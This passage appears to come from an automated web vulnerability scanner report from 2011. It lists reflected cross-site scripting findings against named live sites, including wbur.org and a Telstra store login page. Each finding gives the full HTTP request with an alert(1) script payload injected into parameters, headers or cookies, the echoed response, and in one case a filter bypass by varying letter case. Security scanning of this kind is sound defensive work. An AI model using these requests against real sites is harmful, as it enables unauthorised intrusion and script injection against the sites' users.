3.378. http://www.wbur.org/content/news/science-technology [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.wbur.org
Path:
/content/news/science-technology
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e74ec"><a>f55c0c6ed99 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e74ec\"><a>f55c0c6ed99 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /content/news/science-technology?e74ec"><a>f55c0c6ed99=1 HTTP/1.1 Host: www.wbur.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 ETag: "" Server: Microsoft-IIS/7.0 X-Powered-By: PHP/5.3.6 X-Pingback: http://www.wbur.org/xmlrpc.php Date: Wed, 05 Oct 2011 18:35:04 GMT Connection: close Content-Length: 31789
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.c ...[SNIP]... <a href="/content/news/science-technology?e74ec\"><a>f55c0c6ed99=1/feed" class="sprite rsslink"> ...[SNIP]...
3.379. http://www.wbur.org/content/news/sports [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.wbur.org
Path:
/content/news/sports
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42f80"><a>70cc3c66527 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 42f80\"><a>70cc3c66527 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /content/news/sports?42f80"><a>70cc3c66527=1 HTTP/1.1 Host: www.wbur.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 ETag: "" Server: Microsoft-IIS/7.0 X-Powered-By: PHP/5.3.6 X-Pingback: http://www.wbur.org/xmlrpc.php Date: Wed, 05 Oct 2011 18:35:05 GMT Connection: close Content-Length: 31732
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.c ...[SNIP]... <a href="/content/news/sports?42f80\"><a>70cc3c66527=1/feed" class="sprite rsslink"> ...[SNIP]...
3.380. http://www.wbur.org/content/news/world [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.wbur.org
Path:
/content/news/world
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc8c5"><a>6b268a3ba83 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dc8c5\"><a>6b268a3ba83 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /content/news/world?dc8c5"><a>6b268a3ba83=1 HTTP/1.1 Host: www.wbur.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 ETag: "" Server: Microsoft-IIS/7.0 X-Powered-By: PHP/5.3.6 X-Pingback: http://www.wbur.org/xmlrpc.php Date: Wed, 05 Oct 2011 18:34:52 GMT Connection: close Content-Length: 31719
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.c ...[SNIP]... <a href="/content/news/world?dc8c5\"><a>6b268a3ba83=1/feed" class="sprite rsslink"> ...[SNIP]...
The value of the link request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbcc4"><script>alert(1)</script>29414b4b729 was submitted in the link parameter. This input was echoed as cbcc4\"><script>alert(1)</script>29414b4b729 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /email-this?story=At+The+Democratic+Debate+For+Senate%2C+Warren+A+Standout&link=http://www.wbur.org/2011/10/05/democrats-debatecbcc4"><script>alert(1)</script>29414b4b729 HTTP/1.1 Host: www.wbur.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 ETag: "" Server: Microsoft-IIS/7.0 X-Powered-By: PHP/5.3.6 X-Pingback: http://www.wbur.org/xmlrpc.php Date: Wed, 05 Oct 2011 18:35:54 GMT Connection: close Content-Length: 8266
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conten ...[SNIP]... <form name="emtf_form" id="emtf_form" action="/email-this?story=At+The+Democratic+Debate+For+Senate%2C+Warren+A+Standout&link=http://www.wbur.org/2011/10/05/democrats-debatecbcc4\"><script>alert(1)</script>29414b4b729" method="post"> ...[SNIP]...
The value of the link request parameter is copied into the HTML document as plain text between tags. The payload 53a60<script>alert(1)</script>c5c39e58b2e was submitted in the link parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /email-this?story=At+The+Democratic+Debate+For+Senate%2C+Warren+A+Standout&link=http://www.wbur.org/2011/10/05/democrats-debate53a60<script>alert(1)</script>c5c39e58b2e HTTP/1.1 Host: www.wbur.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 ETag: "" Server: Microsoft-IIS/7.0 X-Powered-By: PHP/5.3.6 X-Pingback: http://www.wbur.org/xmlrpc.php Date: Wed, 05 Oct 2011 18:35:55 GMT Connection: close Content-Length: 8257
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conten ...[SNIP]... <div class="preview-link">http://www.wbur.org/2011/10/05/democrats-debate53a60<script>alert(1)</script>c5c39e58b2e</div> ...[SNIP]...
3.383. http://www.wbur.org/email-this [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.wbur.org
Path:
/email-this
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bfd1"><script>alert(1)</script>983aafa6e69 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8bfd1\"><script>alert(1)</script>983aafa6e69 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /email-this?8bfd1"><script>alert(1)</script>983aafa6e69=1 HTTP/1.1 Host: www.wbur.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 ETag: "" Server: Microsoft-IIS/7.0 X-Powered-By: PHP/5.3.6 X-Pingback: http://www.wbur.org/xmlrpc.php Date: Wed, 05 Oct 2011 18:35:49 GMT Connection: close Content-Length: 7809
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conten ...[SNIP]... <form name="emtf_form" id="emtf_form" action="/email-this?8bfd1\"><script>alert(1)</script>983aafa6e69=1" method="post"> ...[SNIP]...
The value of the story request parameter is copied into the HTML document as text between TITLE tags. The payload 8a337</title><script>alert(1)</script>901985cc373 was submitted in the story parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /email-this?story=At+The+Democratic+Debate+For+Senate%2C+Warren+A+Standout8a337</title><script>alert(1)</script>901985cc373&link=http://www.wbur.org/2011/10/05/democrats-debate HTTP/1.1 Host: www.wbur.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 ETag: "" Server: Microsoft-IIS/7.0 X-Powered-By: PHP/5.3.6 X-Pingback: http://www.wbur.org/xmlrpc.php Date: Wed, 05 Oct 2011 18:35:54 GMT Connection: close Content-Length: 8330
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conten ...[SNIP]... <title>At The Democratic Debate For Senate, Warren A Standout8a337</title><script>alert(1)</script>901985cc373 | WBUR</title> ...[SNIP]...
The value of the story request parameter is copied into the HTML document as plain text between tags. The payload 8984f<script>alert(1)</script>171af24e126 was submitted in the story parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /email-this?story=At+The+Democratic+Debate+For+Senate%2C+Warren+A+Standout8984f<script>alert(1)</script>171af24e126&link=http://www.wbur.org/2011/10/05/democrats-debate HTTP/1.1 Host: www.wbur.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 ETag: "" Server: Microsoft-IIS/7.0 X-Powered-By: PHP/5.3.6 X-Pingback: http://www.wbur.org/xmlrpc.php Date: Wed, 05 Oct 2011 18:35:52 GMT Connection: close Content-Length: 8298
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conten ...[SNIP]... <div class="preview-title">At The Democratic Debate For Senate, Warren A Standout8984f<script>alert(1)</script>171af24e126</div> ...[SNIP]...
The value of the story request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d14db"><script>alert(1)</script>02c36fdc201 was submitted in the story parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /email-this?story=At+The+Democratic+Debate+For+Senate%2C+Warren+A+Standoutd14db"><script>alert(1)</script>02c36fdc201&link=http://www.wbur.org/2011/10/05/democrats-debate HTTP/1.1 Host: www.wbur.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 ETag: "" Server: Microsoft-IIS/7.0 X-Powered-By: PHP/5.3.6 X-Pingback: http://www.wbur.org/xmlrpc.php Date: Wed, 05 Oct 2011 18:35:52 GMT Connection: close Content-Length: 8307
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conten ...[SNIP]... <input type="hidden" name="st" value="At The Democratic Debate For Senate, Warren A Standoutd14db"><script>alert(1)</script>02c36fdc201" /> ...[SNIP]...
The value of the title request parameter is copied into the HTML document as plain text between tags. The payload f49cb<script>alert(1)</script>7779a85574d was submitted in the title parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /media-player?title=livef49cb<script>alert(1)</script>7779a85574d HTTP/1.1 Host: www.wbur.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 ETag: "" Server: Microsoft-IIS/7.0 X-Powered-By: PHP/5.3.6 X-Pingback: http://www.wbur.org/xmlrpc.php Date: Wed, 05 Oct 2011 18:34:32 GMT Connection: close Content-Length: 12998
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
The value of the title request parameter is copied into the HTML document as text between TITLE tags. The payload 92fab</title><script>alert(1)</script>aef5d1e0dbb was submitted in the title parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /media-player?title=live92fab</title><script>alert(1)</script>aef5d1e0dbb HTTP/1.1 Host: www.wbur.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 ETag: "" Server: Microsoft-IIS/7.0 X-Powered-By: PHP/5.3.6 X-Pingback: http://www.wbur.org/xmlrpc.php Date: Wed, 05 Oct 2011 18:34:33 GMT Connection: close Content-Length: 13014
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 903d1"><script>alert(1)</script>a76406f8e7e was submitted in the url parameter. This input was echoed as 903d1\"><script>alert(1)</script>a76406f8e7e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /media-player?url=http://www.wbur.org/2011/10/05/democrats-debate903d1"><script>alert(1)</script>a76406f8e7e&title=At+The+Democratic+Debate+For+Senate%2C+Warren+A+Standout&segment=democrats-debate&pubdate=2011-10-05&type= HTTP/1.1 Host: www.wbur.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 ETag: "" Server: Microsoft-IIS/7.0 X-Powered-By: PHP/5.3.6 X-Pingback: http://www.wbur.org/xmlrpc.php Date: Wed, 05 Oct 2011 18:34:36 GMT Connection: close Content-Length: 13325
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 355b7<script>alert(1)</script>d995b53b1e4 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f0389'-alert(1)-'108281fb85e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b89e'-alert(1)-'f5b59212608 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 29403'-alert(1)-'c65dc0ac446 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d5ff7'-alert(1)-'639bf37f809 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 70c35'-alert(1)-'82e4a292b2a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 11082'-alert(1)-'01a702e49a6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82ed1"-alert(1)-"3b3e10b95ed was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jspix?anId=140&pubId=6168&campId=3025 HTTP/1.1 Host: pixel.adsafeprotected.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://www.google.com/search?hl=en&q=82ed1"-alert(1)-"3b3e10b95ed Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=4C8446019B3F3360E0C860A32A78A4AB; Path=/ Content-Type: text/javascript Date: Wed, 05 Oct 2011 21:19:59 GMT Connection: close
The value of the User-Agent HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3389c"><ScRiPt>alert(1)</ScRiPt>9435cd57010 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /jsdn/web/login/loginview.jsp?view=.view.jsdn.admin.login HTTP/1.1 Host: store.t-suite.telstra.com Accept: */* Accept-Language: en User-Agent: 3389c"><ScRiPt>alert(1)</ScRiPt>9435cd57010 Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 19:25:20 GMT Server: Apache X-Frame-Options: SAMEORIGIN X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181439)/JBossWeb-2.0 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 14840
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <script type="text/javascript" src="/jsdn/web/include/js/jquery-1.3.2.min.js"> ...[SNIP]... <a href="javascript:doLoginProblem('3389c"><ScRiPt>alert(1)</ScRiPt>9435cd57010','/jsdn/login/loginProblem.do?fromLoginPage=true');" class="sbListLink"> ...[SNIP]...
The value of the UID cookie is copied into the HTML document as plain text between tags. The payload 4b7a6<script>alert(1)</script>2d4746f4408 was submitted in the UID cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the UIDR cookie is copied into the HTML document as plain text between tags. The payload 3dfe0<script>alert(1)</script>c302fd396be was submitted in the UIDR cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the ar_p108883753 cookie is copied into the HTML document as plain text between tags. The payload 13b0d<script>alert(1)</script>1156bb2867e was submitted in the ar_p108883753 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the ar_p109848095 cookie is copied into the HTML document as plain text between tags. The payload 35a21<script>alert(1)</script>bcdad932106 was submitted in the ar_p109848095 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the ar_p110620504 cookie is copied into the HTML document as plain text between tags. The payload ef40c<script>alert(1)</script>bbcc5ba2f19 was submitted in the ar_p110620504 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the ar_p117672109 cookie is copied into the HTML document as plain text between tags. The payload f6404<script>alert(1)</script>9d9648ae00e was submitted in the ar_p117672109 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the ar_p119936314 cookie is copied into the HTML document as plain text between tags. The payload 29321<script>alert(1)</script>5dde077ecf8 was submitted in the ar_p119936314 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the ar_p120927104 cookie is copied into the HTML document as plain text between tags. The payload edbfa<script>alert(1)</script>05af581d7d6 was submitted in the ar_p120927104 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 200 OK Server: nginx Date: Wed, 05 Oct 2011 21:12:35 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p91136705=exp=96&initExp=Wed Oct 5 21:12:09 2011&recExp=Wed Oct 5 21:12:35 2011&6d8da494820d410b04ec5b55=1&prad=309859443&arc=206710353&; expires=Tue 03-Jan-2012 21:12:35 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 29564
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"309859443",Pid:"p91136705",Arc:"206710353",Location: ...[SNIP]... Oct 5 21:12:24 2011&recExp=Wed Oct 5 21:12:24 2011&prad=309859443&arc=206710353&', "ar_p120927104": 'exp=1&initExp=Mon Oct 3 16:32:52 2011&recExp=Mon Oct 3 16:32:52 2011&prad=1425782&arc=1524313&edbfa<script>alert(1)</script>05af581d7d6', "ar_p119936314": 'exp=2&initExp=Sun Oct 2 23:59:13 2011&recExp=Wed Oct 5 14:32:48 2011&prad=71054949&arc=43921375&', "ar_p117672109": 'exp=1&initExp=Tue Oct 4 18:40:11 2011&recExp=Tue Oct 4 18 ...[SNIP]...
The value of the ar_p63514475 cookie is copied into the HTML document as plain text between tags. The payload 4b9b8<script>alert(1)</script>dc19970063c was submitted in the ar_p63514475 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the ar_p81479006 cookie is copied into the HTML document as plain text between tags. The payload bc8a7<script>alert(1)</script>64b6b7b1df5 was submitted in the ar_p81479006 cookie. This input was echoed unmodified in the application's response.
